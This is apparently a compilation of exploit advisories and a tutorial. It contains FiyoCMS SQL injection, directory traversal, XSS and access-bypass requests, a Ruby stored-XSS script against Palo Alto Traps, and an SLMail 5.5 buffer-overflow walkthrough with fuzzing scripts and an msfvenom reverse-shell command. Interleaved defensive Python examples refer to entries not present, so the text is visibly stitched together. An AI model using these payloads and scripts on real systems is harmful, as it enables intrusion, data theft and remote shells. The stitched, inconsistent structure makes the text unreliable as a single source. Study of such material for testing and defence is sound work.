    Payload: cat=&user=' AND 1262=BENCHMARK(5000000,MD5(0x72797451)) AND 'egJe'='egJe&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913
    
* PoC:
    POST /fiyo/dapur/apps/app_user/controller/check_user.php HTTP/1.1
    Host: 192.168.248.132
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Referer: http://192.168.248.132/fiyo/dapur/index.php?app=user&act=add
    Content-Length: 42
    Cookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache

    act=email&email=test@asdas.com[sqli]

* Sqlmap:

Parameter: email
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act=email&email=test@asdas.com' AND 5514=5514 AND 'KTqH'='KTqH

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: act=email&email=test@asdas.com' AND SLEEP(5) AND 'UjqT'='UjqT

* PoC:

    POST /fiyo/dapur/apps/app_user/controller/check_user.php HTTP/1.1
    Host: 192.168.248.132
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Referer: http://192.168.248.132/fiyo/dapur/index.php?app=user&act=add
    Content-Length: 34
    Cookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache

    act=user&username=test[sqli]

* Sqlmap:

Parameter: username
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act=user&username=test' AND 5514=5514 AND 'KTqH'='KTqH

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: act=user&username=test' AND SLEEP(5) AND 'UjqT'='UjqT

--------------------------------------------------------------------
Directory Traversal - kcfinder plugins - CVE-2014-1222
--------------------------------------------------------------------

FiyoCMS was found to bundle an outdated KCFinder plugin that is vulnerable to directory traversal.

POST /fiyo//plugins/plg_kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1
Host: 192.168.248.132
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.248.132/fiyo//plugins/plg_kcfinder/browse.php?type=files
Cookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

dir=files&file=../../../../../../../etc/passwd
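Both the com_br controller= include above and this KCFinder download share one root cause: a user-supplied string reaches a filesystem call without being confined to the directory the application meant. The Python below is an added example, not code from either project; UPLOAD_ROOT and the CONTROLLERS allowlist are hypothetical. It shows the two fixes that apply: match an include name against an allowlist instead of treating it as a path, and for genuine file downloads normalise with realpath() before checking containment, rejecting NUL bytes outright (PHP before 5.3.4 truncated paths at a NUL, which is what the %00 in the com_br request exploited).

```python
import os

# Assumed upload root for a KCFinder-style 'browse.php?act=download' handler
# (hypothetical path; FiyoCMS's real layout is not shown on this page).
UPLOAD_ROOT = "/var/www/fiyo/upload"

# Hypothetical allowlist for a Joomla-style 'controller=' parameter. The value
# selects a file to include, so it is looked up by name and never used as a path.
CONTROLLERS = {"default": "default.php", "item": "item.php"}


def controller_file(name):
    """PHP file for a controller name, or None for anything not on the allowlist."""
    return CONTROLLERS.get(name)


def resolve_download(base_dir, dir_param, file_param):
    """Real path to serve for the dir/file parameters, or None if the request
    escapes base_dir. These are the checks the vulnerable download handler lacked."""
    # An embedded NUL is never legitimate in a path; older PHP truncated the
    # path there, which let '../../etc/passwd%00' shed an appended extension.
    if "\x00" in dir_param or "\x00" in file_param:
        return None
    base = os.path.realpath(base_dir)
    # realpath() collapses every '..' and symlink *before* the containment
    # check, so 'files/../../etc/passwd' cannot pass a naive startswith() on
    # the raw string. An absolute dir/file parameter simply discards base
    # inside os.path.join and is caught by the same comparison.
    candidate = os.path.realpath(os.path.join(base, dir_param, file_param))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    print(controller_file("item"))                                   # item.php
    print(controller_file("../../../../../../etc/passwd\x00"))        # None
    print(resolve_download(UPLOAD_ROOT, "files", "report.pdf"))
    print(resolve_download(UPLOAD_ROOT, "files", "../../../../../../../etc/passwd"))  # None
```

The traversal payload from the request above is rejected by the containment check, not by stripping "../" sequences: filtering the string leaves encoded, doubled or symlinked variants open, whereas comparing the resolved path against the resolved base does not care how the escape was spelled.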

----------------------------------------------------
Reflected XSS  - CVE-2014-9146
----------------------------------------------------

http://192.168.248.132/fiyo/?app=article&view=item31ab2"><script>alert(1)</script>0ccba&id=186
http://192.168.248.132/fiyo/?app=article&view=item&id=18690fdb"><script>alert(1)</script>d99c9
http://192.168.248.132/fiyo/?page=5eac15eac1"><script>alert(1)</script>774f2
http://192.168.248.132/fiyo/?app=article95ce1"><script>alert(1)</script>298ab&view=item&id=186
http://192.168.248.132/fiyo/dapur/index.php?app=module&act=edit%22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&id=5
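The reflected payloads above, like those in the Acidcat, Syneto and OneOrZero entries, are all of the '"><script>...' form: the input closes an attribute and opens a new element. Whether such a reflection is actually exploitable depends on the context the browser parses it into, which a plain substring match on the response cannot tell. The Python below is an added example, not code from any of these products: it parses a response with the standard-library HTML parser and reports where a canary lands (inert text, a still-quoted attribute, an on* handler, or a script body). The two templates are constructed to show the vulnerable page and the same page with contextual HTML escaping.

```python
import html
from html.parser import HTMLParser

# Constructed marker; a real scanner would use a fresh random token per request.
CANARY = "q8Zr1vkX"
PAYLOAD = '"><script>alert(%s)</script>' % CANARY   # shape of the admin_*.asp payloads


class ContextFinder(HTMLParser):
    """Records the context in which the canary lands after parsing:
    'text' (inert), 'attribute' (still inside a quoted value, did not break
    out), 'event-handler' (an on* attribute: executes) or 'script-body'
    (inside <script>: executes)."""

    def __init__(self, canary):
        super().__init__()
        self.canary = canary
        self.in_script = False
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        for name, value in attrs:
            # HTMLParser has already decoded &quot;/&lt; in attribute values,
            # so an escaped payload shows up here as a harmless attribute hit.
            if value and self.canary in value:
                ctx = "event-handler" if name.startswith("on") else "attribute"
                self.hits.append((ctx, name))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.canary in data:
            self.hits.append(("script-body" if self.in_script else "text", None))


def injection_contexts(body, canary=CANARY):
    parser = ContextFinder(canary)
    parser.feed(body)
    parser.close()
    return parser.hits


def is_exploitable(hits):
    return any(ctx in ("script-body", "event-handler") for ctx, _ in hits)


def render_vulnerable(value):
    # Constructed template: raw interpolation into an attribute, as the vulnerable pages do.
    return '<form><input name="color" value="%s"></form>' % value


def render_fixed(value):
    # Same template with contextual output encoding: the quote that would close
    # the attribute becomes &quot; and '<' becomes &lt;, so no new tag is parsed.
    return '<form><input name="color" value="%s"></form>' % html.escape(value, quote=True)


if __name__ == "__main__":
    print(injection_contexts(render_vulnerable(PAYLOAD)))   # [('script-body', None)]
    print(injection_contexts(render_fixed(PAYLOAD)))        # [('attribute', 'value')]
    print(injection_contexts('<img src=x onerror=alert(%s)>' % CANARY))
```

The Syneto info= payload above (an img tag with an onerror handler) is the event-handler case; the same classifier flags it without any script element being present.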


----------------------------------------------------
Direct URL Access - CVE-2014-9147
----------------------------------------------------
The database backup can be downloaded without any authentication:
http://192.168.248.132/fiyo/.backup/[db_backup.sql filename]

----------------------------------------------------
Access Control Bypass - CVE-2014-9148
----------------------------------------------------

An administrator-level user can reach the super-administrator functions "Install & Update" and "Backup" by browsing directly to the URLs below:
  1. http://192.168.248.132/fiyo/dapur/?app=config&view=backup
  2. http://192.168.248.132/fiyo/dapur/?app=config&view=install
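Items 1 and 2 work because the role check lives in the menu that renders the links, not in the code that serves the views; the .backup/ download above is the same mistake one level lower, a file exposed with no handler at all. The Python below is an added example, not FiyoCMS code; the role names and route table are hypothetical. It contrasts a dispatcher that only gates on "is an administrator" with one that records the minimum role per route and denies anything not on the table, and applies both to the URLs quoted above.

```python
from urllib.parse import parse_qs, urlsplit

ROLE_RANK = {"user": 1, "administrator": 2, "superadministrator": 3}

# Hypothetical route table modelled on the dapur/?app=...&view=... URLs above;
# FiyoCMS's real role names and routes are not shown on this page.
REQUIRED_ROLE = {
    ("config", "backup"): "superadministrator",
    ("config", "install"): "superadministrator",
    ("config", "general"): "administrator",
    ("article", "list"): "user",
}


def route_from_url(url):
    """(app, view) from a dapur-style URL; missing parameters come back as None."""
    q = parse_qs(urlsplit(url).query)
    return q.get("app", [None])[0], q.get("view", [None])[0]


def dispatch_vulnerable(role, app, view):
    """Menu-level filtering only: the role decides which links are rendered,
    while the handler accepts any logged-in administrator who types the URL."""
    if ROLE_RANK.get(role, 0) < ROLE_RANK["administrator"]:
        return 403
    return 200 if (app, view) in REQUIRED_ROLE else 404


def dispatch_fixed(role, app, view):
    """Authorisation at the dispatcher: every route declares its minimum role
    and routes not on the table are denied, so knowing the URL gains nothing."""
    required = REQUIRED_ROLE.get((app, view))
    if required is None:
        return 404
    if ROLE_RANK.get(role, 0) < ROLE_RANK[required]:
        return 403
    return 200


def check_url(role, url, dispatcher=dispatch_fixed):
    return dispatcher(role, *route_from_url(url))


if __name__ == "__main__":
    backup = "http://192.168.248.132/fiyo/dapur/?app=config&view=backup"
    print(check_url("administrator", backup, dispatch_vulnerable))  # 200
    print(check_url("administrator", backup))                       # 403
    print(check_url("superadministrator", backup))                  # 200
```

Hiding a menu entry is presentation, not access control; the fixed dispatcher makes the super-administrator requirement a property of the route, so every path to it (typed URL, bookmark, CSRF) meets the same check.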
            
#!/usr/bin/ruby
=begin
------------------------------------------------------------------------
Product: Palo Alto Traps Server (formerly Cyvera Endpoint Protection)
Vendor: Palo Alto Networks
Vulnerable Version(s): 3.1.2.1546
Tested Version: 3.1.2.1546
Advisory Publication: 29 March 2015 
Vendor Notification: 17 October 2014 
Vulnerability Type: Stored Cross Site Scripting 
CVE Reference: CVE-2015-2223
Risk Level: High
Solution Status: 
Discovered and Provided: Michael Hendrickx, help AG
------------------------------------------------------------------------

About the product:
Palo Alto Traps is an advanced endpoint protection suite that detects attacks such as memory corruption, executable child processes and DLL hijacking. Aside from optionally blocking the attack, it reports the event (a “trap”) to a central server for logging.

About the vulnerability:
An attacker can send a SOAP request with JavaScript embedded in it, which is stored in the database. When an administrator monitors the Traps admin screen and opens the details of that event, the JavaScript executes in the administrator's browser.

The XSS works in the <b:Arguments>, <b:FileName> and <b:URL> parameters, for example:

  <b:Arguments>"C:\\Users\\Michael\\fake.exe" 
    <script>
      alert("xss");
    </script>
  </b:Arguments>

A POC script can be found at the following URL:
https://github.com/ndrix/random-scripts/blob/master/pa_traps_xss.rb

------------------------------------------------------------------------

Solution:

The vendor was notified back in October 2014, and we've sent a few follow-ups since.  Contact the vendor for the patch details.

References:

[1] help AG middle East: http://www.helpag.com/ 
[2] Palo Alto Traps: https://www.paloaltonetworks.com/products/endpoint-security.html 
------------------------------------------------------------------------
=end

# PA traps fuzzer? :)

require 'net/http'

def usage
	puts "pa_traps.rb <trapserver>"
	exit
end

usage if ARGV.empty?

# get the arguments
traps = {}
traps[:server] = ARGV[0]
traps[:port] = 2125

http_headers = {
	"Content-Type" => "application/soap+xml; charset=utf-8", 
	"Expect" => "100-continue",
	"Connection" => "Keep-Alive"
}

soap_envelope = <<-SOAP
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
	<s:Header>
		<a:Action s:mustUnderstand="1">http://tempuri.org/IClientServices/SendPreventions</a:Action>
		<a:MessageID>urn:uuid:d1bdb437-ea8e-47e8-8167-6cfd69655f43</a:MessageID>
		<a:ReplyTo>
			<a:Address>http://www.w3.org/2005/08/addressing/anonymous</a:Address>
		</a:ReplyTo>
		<a:To s:mustUnderstand="1">http://10.13.6.82:2125/CyveraServer/</a:To>
	</s:Header>
	<s:Body>
		<SendPreventions xmlns="http://tempuri.org/">
			<machine>VMNAME1</machine>
			<preventions xmlns:b="http://schemas.datacontract.org/2004/07/Cyvera.Common.Interfaces" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
				<b:PreventionDetails>
					<b:Id>0</b:Id>
					<b:MachineName>AEDXBNB-MHE</b:MachineName>
					<b:Message>Exploit attempt was prevented by Traps</b:Message>
					<b:PreventionKey>116215ce-65e2-4b77-b176-6c0279d12c37</b:PreventionKey>
					<b:ProcessName>Excel.exe</b:ProcessName>
					<b:Time>2014-10-15T13:18:56</b:Time>
					<b:UserName> HELPAG\\hendrickx </b:UserName>
					<b:Arguments>"C:\\Users\\Michael\\fake.exe" 
						&#0000060;script&#0000062;
							alert("xss");
						&#0000060;/script&#0000062;
					</b:Arguments>
					<b:CyveraCode>EXEPROT</b:CyveraCode>
					<b:CyveraInternalCode i:nil="true"/>
					<b:CyveraVersion>3.1.2.1546</b:CyveraVersion>
					<b:FileName>
						&#0000060;script&#0000062;
							alert("xss");
						&#0000060;/script&#0000062;
					</b:FileName>
					<b:PreventionMode>Notify</b:PreventionMode>
					<b:ProcessHash i:nil="true"/>
					<b:ProcessVersion>1.12.1.0</b:ProcessVersion>
					<b:Sent>false</b:Sent>
					<b:SentToServerTime>0001-01-01T00:00:00</b:SentToServerTime>
					<b:Source>Unknown</b:Source>
					<b:Status i:nil="true"/>
					<b:URL>
						&#0000060;script&#0000062;
							alert("xss in URL");
						&#0000060;/script&#0000062;
					</b:URL>
				</b:PreventionDetails>
			</preventions>
		</SendPreventions>
	</s:Body>
</s:Envelope>
SOAP

if traps[:server].empty?
	puts "Need a traps server"
	usage
end

# summary
puts "Testing #{traps[:server]}"

Net::HTTP.start(traps[:server], traps[:port]) do |http|
	r1 = http.request_post('/CyveraServer/', soap_envelope, http_headers);
	puts r1
	puts r1.inspect
end
            

In this post we are going to exploit the SLMail 5.5 service, which is vulnerable to a buffer overflow in the PASS field:

image 65

Although there are already scripts that automate the exploitation, we are going to do it manually.

First of all, it is advisable to have read the Buffer Overflow Fundamentals post if you have never carried out this kind of attack.

We will be working with our Kali box and a 32-bit Windows 7.

  • Index:
    • Introduction
    • Fuzzing
    • Taking control of EIP
    • Finding badchars
    • Creating the payload with msfvenom
    • Finding an address with the JMP ESP opcode
    • Final exploit

Introduction

The first thing is to download and install the «SLMail» service on the Windows 7 machine. Before that, we have to make sure that DEP is disabled on Windows 7 and that the firewall does not block us, at least on ports 25 and 110.

  • The firewall can be configured with «Windows Firewall with Advanced Security» or with netsh. How to do it with the latter is shown in the netsh pivoting post.
  • DEP (Data Execution Prevention) can be disabled from a terminal run as administrator with the command:
    • bcdedit.exe /set nx AlwaysOff

We can download SLMail 5.5 from its official website. Once downloaded, we start the installation:

image 66

In this case there is nothing to change; clicking «Next» all the way through is enough. When the installation finishes we reboot the machine and that's it, SLMail is installed.

When the machine boots we open SLMail as administrator:

image 67

And go to the control tab:

image 68

From here we can pause or start the service, which will come in handy when it crashes after we trigger the buffer overflow. As we can see it is already started, so if we go to our Kali box we can see ports 25 and 110 open:

image 69

With the service installed, running and exposed, we can now get on with the buffer overflow.

In this particular case we have already identified, and know beforehand, that the service is vulnerable. We have also seen in searchsploit that there are already scripts that exploit it automatically, so we will lean on one of them to work out the approach.

In any other case, when we don't know what service it is and know almost nothing about it, the best option is simply to connect to the port with netcat or telnet, see whether it answers in some way, and from there figure out what can be done.

That said, let's take a look at the first script from searchsploit:

image 70

The title already tells us that the vulnerable parameter appears to be 'PASS'.

Looking at the first script, we can see what the procedure would be:

image 71

The PASS parameter seems to be the password field of a login. Also, if we look closely, of the two ports SLMail uses, 25 and 110, the script connects to 110, so we have also identified which of the two ports to connect to.

Let's try it manually:

image 72

Both fields seem to be accepted, even though we are told the credentials are wrong.

At this point we have everything we need to start:

  • Vulnerable service identified
  • Port to connect to
  • Vulnerable parameter

Fuzzing

Knowing all this, it is time to fuzz, that is, we have to find out how much data the PASS parameter needs in order to trigger the buffer overflow and crash the program.

Before fuzzing, on the Windows 7 machine we open Immunity Debugger as administrator and attach to the SLMail process:

image 73
image 74

This way we have attached Immunity Debugger to the SLMail process:

image 75

Careful: when we attach Immunity to a process, the process is paused, as we can see at the bottom right:

image 76

So never forget to resume the process:

image 77
image 78

With that done, to fuzz we will use a Python script that automates the task for us:

#!/usr/bin/python

from pwn import *
import socket, sys

if len(sys.argv) < 2:
    print "\n[!] Uso: python " + sys.argv[0] + " <ip-address>\n"
    sys.exit(0)

# Global variables
ip_address = sys.argv[1]
rport = 9999

if __name__ == '__main__':

    buffer = ["A"]
    contador = 100

    while len(buffer) < 32:
        buffer.append("A"*contador)
        contador += 100

    p1 = log.progress("Data")

    for strings in buffer:

        try:
            p1.status("Enviando %s bytes" % len(strings))

            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip_address, rport))
            data = s.recv(1024)


            s.send("%s" % strings)
            data = s.recv(1024)

        except:

            print "\n[!] Ha habido un error de conexion\n"
            sys.exit(1)

This is the standard script; we only need to adapt it to the case at hand:

#!/usr/bin/python

from pwn import *
import socket, sys

if len(sys.argv) < 2:
    print "\n[!] Uso: python " + sys.argv[0] + " <ip-address>\n"
    sys.exit(0)

# Global variables
ip_address = sys.argv[1]
rport = <port>

if __name__ == '__main__':

    buffer = ["A"]
    contador = 150

    while len(buffer) < 32:
        buffer.append("A"*contador)
        contador += 150

    p1 = log.progress("Data")

    for strings in buffer:

        try:
            p1.status("Enviando %s bytes" % len(strings))

            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip_address, rport))
            data = s.recv(1024)

            s.send("USER prueba\n\r")
            data = s.recv(1024)

            s.send("PASS %s\n\r" % strings)
            data = s.recv(1024)

        except:

            print "\n[!] Ha habido un error de conexion\n"
            sys.exit(1)

When we send USER and PASS we put \n\r at the end: we are simulating pressing the Enter key.

Using the script is simple; we just have to give it an IP, besides editing the port in the code:

image 79
image 80

With the port changed, let's run the script against the Windows 7 machine:

image 81
image 82
image 83

When the byte count gets stuck, we go back to Immunity Debugger (we can also watch how Immunity behaves while it receives the bytes):

image 84
image 85
image 86

As we can see the program's state is «Paused», so the program has crashed. We can also see the state the registers were left in.

If we look at the EBP and EIP fields, we see that the value of the 4 bytes is \x41 (this is the format for representing hexadecimal, with \x as prefix).

image 87

For those who don't know, 41 is the letter A in hexadecimal, which is exactly what we are sending.

image 88
image 89

What does this mean?

Basically, imagine that the service expected at most a 30-character value in the «PASS» field (which is not the case; it is quite a bit more).

What would happen if we sent it 60 characters?

What happens is that the memory the program has reserved for that field is much smaller than the data received, so that difference of 30 (60 – 30) has to go somewhere. And this is where registers start getting overwritten.

The basic idea is this:

image 90

With this clear, and having seen how we overwrote EIP and EBP, the idea now is to take control of EIP, that is, to determine exactly how many 'A's we have to send before we start overwriting it.

This register matters so much to us because it holds the address of the program's next instruction; that is why it is called EIP (Extended Instruction Pointer).

For the same reason the program crashes: since we are overwriting this register, when the program goes to continue its flow it looks at the address EIP points to, and of course, if the address it points to is 0x41414141 it goes nowhere, because that is not a valid memory address. That is why the program crashes.

Taking control of EIP

With all this clear, to determine the EIP offset, in other words how many 'A's are needed before overwriting it, we will use two Metasploit tools (in an exam like the OSCP it is perfectly acceptable to use these two tools):

  • pattern_create.rb
  • pattern_offset.rb

Making sure we have Metasploit installed, we can find these two tools as follows:

image 91

First we will use pattern_create.rb, which lets us create a string of whatever length we specify. This string is specifically designed so that it contains no repeated patterns.

Earlier we verified that with 2700 bytes we managed not only to crash the program but also to overwrite the registers. So now we will change the script a bit so that it directly sends a single payload. The script template to use would be the following:

#!/usr/bin/python

from pwn import *
import socket, sys
from struct import pack

if len(sys.argv) < 2:
    print "\n[!] Uso: python " + sys.argv[0] + " <ip-address>\n"
    sys.exit(0)

# Global variables
ip_address = sys.argv[1]
rport = 9999

shellcode_windows=()

shellcode_linux=()

if __name__ == '__main__':

    p1 = log.progress("Data")

    payload = <payload>

    try:
        p1.status("Enviando payload")

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip_address, rport))
        data = s.recv(1024)


        s.send(payload + '\r\n')
        data = s.recv(1024)


    except:

        print "\n[!] Ha habido un error de conexion\n"
        sys.exit(1)

Again, we simply copy it and adapt it to what we need:

#!/usr/bin/python

from pwn import *
import socket, sys
from struct import pack

if len(sys.argv) < 2:
    print "\n[!] Uso: python " + sys.argv[0] + " <ip-address>\n"
    sys.exit(0)

# Global variables
ip_address = sys.argv[1]
rport = 110

shellcode_windows=()

shellcode_linux=()

if __name__ == '__main__':

    p1 = log.progress("Data")

    payload = <payload>

    try:
        p1.status("Enviando payload")

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip_address, rport))
        data = s.recv(1024)


        s.send('USER prueba\r\n')
        data = s.recv(1024)

        s.send('PASS ' + payload + '\r\n')
        data = s.recv(1024)

    except:

        print "\n[!] Ha habido un error de conexion\n"
        sys.exit(1)

With this, let's now generate a 2700-byte string with pattern_create.rb:

pattern_create.rb -l <string length>

image 92

We copy this output and put it in the script's payload variable:

image 93

This way, let's run the script so that it sends this payload directly to the «PASS» field.

Every time we trigger a buffer overflow and the program crashes, we have to restart the service and attach Immunity Debugger to it again, since when the service restarts the process changes.

We run the exploit:

image 94

In Immunity we can see the program crash:

image 95

With that done, the idea now is to look at the value of the EIP register:

image 96

It is 39694438. This value corresponds to a specific part of the string we sent in the payload.

Using this number, we run pattern_offset.rb:

pattern_offset.rb -q <EIP value>

image 97

Note that it tells us the offset is 2606, which means that if we send 2606 'A's and 4 'B's, the EIP value should be 42424242 (since 42 is B in hexadecimal).

Let's check it:

image 98

<We restart the service>

<We attach with Immunity Debugger>

We run the exploit:

image 99
image 100

As we can see, EIP holds the 4 'B's we sent. This is the point at which we say we have control of EIP.

Finding badchars

Now it is time to find the «badchars». Badchars are bytes that, so to speak, the program does not accept, so if we generated a payload containing a badchar, it would not work.

For this step we will use mona, an Immunity Debugger module that makes the task easier.

Installing it is quite simple: we download the mona.py script from its official repository and move it to the following path:

C:\Archivos de programa\Immunity Inc\Immunity Debugger\PyCommands

C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands

And with that it is installed. We can check it in Immunity Debugger with !mona:

image 101

Having done this, we configure the working folder with the command:

!mona config -set workingfolder <path>\%p

image 102

Now we generate a byte array as follows:

!mona bytearray

image 103

This generates a string with every possible byte; it will help us determine which ones are badchars and which ones are not.

Also, since we configured the working folder beforehand, this command will have created a folder named after the process we are attached to:

image 104

Inside, we can find a txt file with the byte string:

image 105
image 106

We copy the string and add it to the payload.

image 107

With this, we do the usual: restart the service, attach with Immunity and run the exploit:

image 108
image 109

Now we are interested in the value of ESP. Using this value, mona will automate the task of detecting the badchars for us.

We will use the following command:

!mona compare -f <path to bytearray.bin> -a <ESP address>

!mona compare -f C:\Users\JuanA\Desktop\SLMail\bytearray.bin -a 0258A128

image 110

This way, as we can see, mona tells us that one badchar is \x00 (this is a very typical badchar, so it is normally removed right away).

With that done, we update the bytearray files we have, telling them to drop \x00:

!mona bytearray -cpb '"<badchars>"'

!mona bytearray -cpb '"\x00"'

image 111

This way the bytearray file will have been updated.

image 139

Since we now know that \x00 is a badchar, we simply remove it from the payload in the exploit:

image 112

We run the exploit…

image 113

And now we repeat the same process to detect the next badchar:

!mona compare -f <path to bytearray.bin> -a <ESP address>

!mona compare -f C:\Users\JuanA\Desktop\SLMail\bytearray.bin -a 01ADA128

image 114

It detects that \x0a is another one. So we do the same as before:

!mona bytearray -cpb '"<badchars>"'

!mona bytearray -cpb '"\x00\x0a"'

image 115

We check that it has been removed:

image 116

And with this, same as before, we now remove \x0a from the payload.

image 117

And we repeat the whole process again; this part is a bit repetitive.

image 118
image 119

!mona compare -f <path to bytearray.bin> -a <ESP address>

!mona compare -f C:\Users\JuanA\Desktop\SLMail\bytearray.bin -a 026EA128

image 120

We detect another badchar, this time \x0d. So we do the same:

!mona bytearray -cpb '"<badchars>"'

!mona bytearray -cpb '"\x00\x0a\x0d"'

image 121

And likewise, we now remove \x0d from the exploit and repeat everything, until it tells us that it finds none:

image 122

So we have discovered all the badchars; in this case they are:

  • \x00
  • \x0a
  • \x0d
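
The two mechanical steps above, the cyclic pattern lookup that turned EIP 39694438 into offset 2606 and the repeated bytearray/compare rounds that produced \x00, \x0a and \x0d, can be reproduced offline. The following is an added example written for this page, not the post's script nor Metasploit or mona code: it reimplements in Python 3 the construction behind pattern_create.rb and pattern_offset.rb and one "!mona compare" round, driving the rounds with a constructed stand-in for the memory dump at ESP (in the real exercise that dump comes from the debugger). It also generalises slightly, accepting the EIP value in either byte order or as the raw 4-character string.

```python
import itertools
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def pattern_create(length):
    """Same construction as pattern_create.rb: "Aa0Aa1Aa2...Zz9", one triple per
    (upper, lower, digit) combination, so no 4-byte window repeats within the
    first 26*26*10*3 = 20280 bytes (the sequence restarts after that)."""
    out = []
    size = 0
    while size < length:
        for up, lo, dg in itertools.product(UPPER, LOWER, DIGITS):
            out.append(up + lo + dg)
            size += 3
            if size >= length:
                break
    return "".join(out)[:length]


def pattern_offset(pattern, eip_value):
    """Equivalent of pattern_offset.rb -q. eip_value is the register value as the
    debugger shows it (e.g. 0x39694438): the register holds the little-endian
    view of the four bytes that overwrote it, so "8Di9" is what actually sat in
    the pattern. Big-endian is tried second, a plain string as given. Returns -1
    if the value does not come from this pattern."""
    data = pattern.encode()
    if isinstance(eip_value, int):
        needles = [struct.pack("<I", eip_value), struct.pack(">I", eip_value)]
    else:
        needles = [eip_value.encode()]
    for needle in needles:
        idx = data.find(needle)
        if idx != -1:
            return idx
    return -1


def make_bytearray(excluded=()):
    """What "!mona bytearray -cpb <chars>" writes to bytearray.bin: every byte
    value 0x00..0xff except the ones already known to be bad."""
    skip = set(excluded)
    return bytes(b for b in range(256) if b not in skip)


def first_badchar(sent, observed):
    """One round of "!mona compare": walk the bytes we sent against the copy
    that landed on the stack at ESP. The first position that differs, or where
    the copy ends early, identifies the next bad char; everything after it is
    unreliable, which is why the post repeats the round once per char found."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def address_has_badchars(addr, badchars):
    """The post's rule for the JMP ESP address, checked on the little-endian
    bytes that will actually overwrite EIP."""
    return any(b in badchars for b in struct.pack("<I", addr))


def badchar_rounds(observe):
    """Drive the iterative procedure: observe(sent) returns what was found at
    ESP. Stops when a full round comes back unchanged."""
    found = []
    while True:
        sent = make_bytearray(found)
        bad = first_badchar(sent, observe(sent))
        if bad is None:
            return found
        found.append(bad)


def fake_slmail_copy(sent):
    """Constructed stand-in (not captured from SLMail) for how the PASS value is
    copied: 0x00 terminates the C string, 0x0a and 0x0d end the POP3 line."""
    for terminator in (0x00, 0x0a, 0x0d):
        if terminator in sent:
            sent = sent[:sent.index(terminator)]
    return sent


if __name__ == "__main__":
    pattern = pattern_create(2700)
    print("offset of EIP=0x39694438:", pattern_offset(pattern, 0x39694438))  # 2606
    print("badchars:", [hex(b) for b in badchar_rounds(fake_slmail_copy)])
    print("0x5f4c4d13 clean:", not address_has_badchars(0x5f4c4d13, {0x00, 0x0a, 0x0d}))
```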

Creating the payload with msfvenom

Knowing this, we create the reverse shell payload with msfvenom (any other payload could be used, for example one that runs a specific command on Windows):

msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -a x86 --platform windows -b <badchars> -e x86/shikata_ga_nai -f c

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.208.10 LPORT=443 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -f c

image 123

